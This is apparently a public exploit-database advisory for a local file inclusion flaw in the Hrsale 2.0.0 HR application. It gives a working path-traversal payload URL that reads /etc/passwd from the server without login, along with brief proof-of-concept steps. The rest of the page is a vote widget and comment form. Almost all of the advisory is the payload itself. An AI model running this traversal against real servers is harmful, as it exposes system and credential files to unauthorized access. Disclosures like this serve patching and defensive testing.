Hrsale 2.0.0 Local File Inclusion

2020.10.21

Credit: Sosecure

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Date: 10/21/2020
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0
Description:
This exploit allow you to download any readable file from server with out permission and login session.
Payload :
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
POC:
1. Access to HRsale application and browse to download path with payload
2. Get /etc/passwd

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Hrsale 2.0.0 Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.